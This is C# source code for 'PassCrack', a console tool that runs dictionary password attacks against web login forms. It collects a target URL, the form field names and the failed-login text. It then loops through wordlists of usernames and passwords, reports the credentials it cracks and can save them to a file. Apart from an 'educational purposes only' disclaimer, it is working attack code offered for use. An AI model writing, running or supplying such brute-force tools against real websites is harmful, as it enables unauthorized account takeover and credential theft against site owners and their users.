/**
* User Setup For The Attack (eg. Target, Word list, etc..)
*/
public static void userSetup()
{
Console.Clear();
resetConfig();
//Called to display the tile of the program
coolTitle();
Console.WriteLine("\n ** This program is for Educational Purposes Only **\n " +
" ** I Will not be held accountable for any elicit use of this software **");
Console.WriteLine("\nWelcome to PassCrack, this is a program that allows a user to easily run word lists against web forms\n");
Console.WriteLine("Select A Form Type...");
Console.ForegroundColor = ConsoleColor.Cyan;
Console.WriteLine("1) ASP/ASPX\n");
//Console.WriteLine("2) General POST Form\n");
//Console.WriteLine("3) General GET Form\n");
Console.ResetColor();
try
{
formType = Int32.Parse(getUserResponse("Select A Form Type (1-...): "));
}
catch (Exception e) { }
Console.ForegroundColor = ConsoleColor.Cyan;
//Convert selected form to string for display
switch (formType)
{
case 1:
formTypeStr = "\"ASP/ASPX\"";
break;
case 2:
formTypeStr = "\"General POST Form\"";
break;
case 3:
formTypeStr = "\"General GET Form\"";
break;
default:
formTypeStr = "\"General POST Form\"";
break;
}
//Print what the selected form is
Console.WriteLine(String.Format("You Selected: {0}\n", formTypeStr));
Console.ResetColor();
//Resolve the host name passed to an IP address, if host doesn't resolve tell the user the URL was bad and then restart
try
{
host = UserInput.getUserResponse("Base URL To Login Page (eg. www.example.com): ");
IPAddress testIp = null;
if (!IPAddress.TryParse(host, out testIp))
{
ip = (Dns.GetHostEntry(host).AddressList[0]).ToString();
}
else
{
ip = host;
}
Console.ForegroundColor = ConsoleColor.Green;
Console.WriteLine(String.Format("Host name Resolved to {0}", ip));
Console.ResetColor();
}
catch (Exception e)
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("Invalid URL : " + e.Message);
Console.ResetColor();
Thread.Sleep(3000);
Console.Clear();
userSetup();
}
//Add the attack URI to the resolved IP
addOnPath = UserInput.getUserResponse("Input the add on path (eg /login/...): ");
requestType = UserInput.getUserResponse("Input the request type (http/https if login form is https use https): ");
//Combine the base URL and the full URI and confirm that it is correct
fullPath = requestType + "://" + host + addOnPath;
if (UserInput.getUserResponse(String.Format("Is this path correct: {0} (y/n): ", fullPath)) == "n")
{
Console.Clear();
userSetup();
}
//Inform the user it is getting the response from the URL to verify that its not a 404 or something similar
Console.ForegroundColor = ConsoleColor.Cyan;
Console.WriteLine("Getting Response From URL...");
Console.ResetColor();
//Wrap block in try catch to avoid 404 errors
try
{
//As well check the response length to see if it is greater than a certain character limit to verify that something was actually returned
if (Requests.getResponse().Length > 20)
{
//If it is inform the user it most likely found a valid response
Console.ForegroundColor = ConsoleColor.Green;
Console.WriteLine("Response Received!");
Console.ResetColor();
}
//However for some strange reason if the character length was less than 20 inform the user and ask if they wish to see the response
else
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("An Unknown Error Occurred");
Console.ResetColor();
if (UserInput.getUserResponse("Would you like to see the response? (y/n): ") == "y")
{
Console.WriteLine(Requests.getResponse());
if (UserInput.getUserResponse("Would you like to continue if not? (y/n)") == "n")
{
Console.Clear();
userSetup();
}
}
else
{
Console.Clear();
userSetup();
}
}
}
//If a 404 or similar exception was returned tell the user the exception and return to the menu
catch (Exception e)
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("Error Getting Response From Server: " + e.Message);
Console.ResetColor();
Thread.Sleep(2000);
Console.Clear();
userSetup();
}
//Field names for the user name and password
usernameField = UserInput.getUserResponse("Input the name of the user field on the form (unsaniztized): ");
passwordField = UserInput.getUserResponse("Input the name of the password field on the form (unsaniztized): ");
//The user selected a general post form
if (formType == 2 || formType == 3)
{
rawFormVariables = UserInput.getUserResponse("Input Any Custom Parameters: ");
customFormVariables = buildCustomOptions(rawFormVariables);
cookies = getUserResponse("Input any cookies that need to be sent in the request (can be left blank): ");
}
//Ask the user for the invalid login response
invalidPasswordText = UserInput.getUserResponse("Input the name of the error element ID: ");
//Ask for a path to a password list and escape all back slashes
wordListPath = sanitizePath(UserInput.getUserResponse("Path to password list file: "));
//Asks the user if they want to use a user list or a single user name
if (UserInput.getUserResponse("Would you like to use a user list or a single user name? (list / single): ") == "list")
{
userListPath = sanitizePath(UserInput.getUserResponse("Path to user list file: "));
}
//If 'list' isn't typed default to single
else
{
username = UserInput.getUserResponse("User name: ");
}
//Set weather or not we will show the attempts
if (UserInput.getUserResponse("Would you like to show attempts? (y/n): ") == "y")
{
showAttempts = true;
}
//Display the selected options
printConfig();
//Confirm that the settings are correct and start the attack
if (UserInput.getUserResponse("All configured settings values are listed above, are you sure you want to proceed? (y/n): ") == "y")
{
Cracker.beginAttack();
}
//If not then reset
else
{
Console.Clear();
userSetup();
}
}
/**
* Called to actually start attempting passwords
*/
public static void beginAttack()
{
//Load lists
loadLists();
//Check if it is meant to be using a usernames and passwords list
if (usernames.Count > 0)
{
//Foreach username
foreach (string username in usernames)
{
//Iterate through all the possible passwords
foreach (string password in passwords)
{
//If a match is found add it to the corresponding point in the array list that is in line with the user name
if (!Requests.sendLoginRequest(username, password).Contains(UserInput.invalidPasswordText))
{
foundPasswords.Add(password);
passwordFound = true;
break;
}
//If no password was found add no password found in the place instead to keep the list in line
else
{
foundPasswords.Add("No Password Found");
}
//As well, if showAttempts is set to true print out the fact that the attempt was invalid
if (showAttempts == true)
{
Console.Write(String.Format("Username: {0} Password: {1} Status: ", username, password));
Console.ForegroundColor = ConsoleColor.Red;
Console.Write("Incorrect\n");
Console.ResetColor();
}
}
}
}
//If the user selected to use a singular username
else
{
//Only loop through each password in the list
foreach (string password in passwords)
{
//If the correct password was found set teh correctUsername and correctPassword variables and break out of the loop
if (!Requests.sendLoginRequest(username, password).Contains(UserInput.invalidPasswordText))
{
passwordFound = true;
correctPassword = password;
correctUsername = username;
break;
}
//Similar to above if showAttempts is true show the failed password attempt
if (showAttempts == true)
{
Console.Write(String.Format("Username: {0} Password: {1} Status: ", username, password));
Console.ForegroundColor = ConsoleColor.Red;
Console.Write("Incorrect\n");
Console.ResetColor();
}
}
}
//After both loops are done and a password was found this block runs
if (passwordFound == true)
{
//First it checks if we are using a singular user name
if (username.Length > 0)
{
//If so change the text to green display "Password Found!!" and list the correct username and password
Console.ForegroundColor = ConsoleColor.Green;
Console.WriteLine("Password Found!!");
Console.WriteLine(String.Format("Username: {0} Password: {1}", correctUsername, correctPassword));
Console.ResetColor();
//And make the user type return if they are done if they dont then exit the program on the next key press
if (UserInput.getUserResponse("If you wish to return to the menu please type \"return\":") == "return")
{
Console.ReadKey();
UserInput.userSetup();
}
else
{
Console.WriteLine("Press Any Key To Exit...");
Console.ReadKey();
}
}
//However if the user was running a username list then display each user name and password combo, and ask if they want to write it to a file
else
{
Console.WriteLine("The Following List Of Passwords Was Found...\n");
for (int i = 0; i < foundPasswords.Count; i++)
{
if (foundPasswords[i] != "No Password Found")
{
Console.WriteLine(String.Format("Username: {0} Password: {1}", usernames[i], foundPasswords[i]));
}
}
//Asks the user if they want to output the password/username list to a file
if (UserInput.getUserResponse("Would you like to output this list to a file? (y/n):") == "y")
{
//Ask where then generate a variable to then write to the file
string outPath = UserInput.getUserResponse("Enter An Output Path: ");
string output = "";
for (int i = 0; i < foundPasswords.Count; i++)
{
if (foundPasswords[i] != "No Password Found")
{
output += String.Format("Username: {0} Password: {1}", usernames[i], foundPasswords[i]) + "\n";
}
}
File.WriteAllText(outPath, output);
}
}
}
//If no passwords were found at all
else
{
//Turn the text red and then wait for the user to press a key then exit
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("No Matches Found");
Console.ResetColor();
Console.WriteLine("Press Any Key To Exit...");
Console.ReadKey();
}
}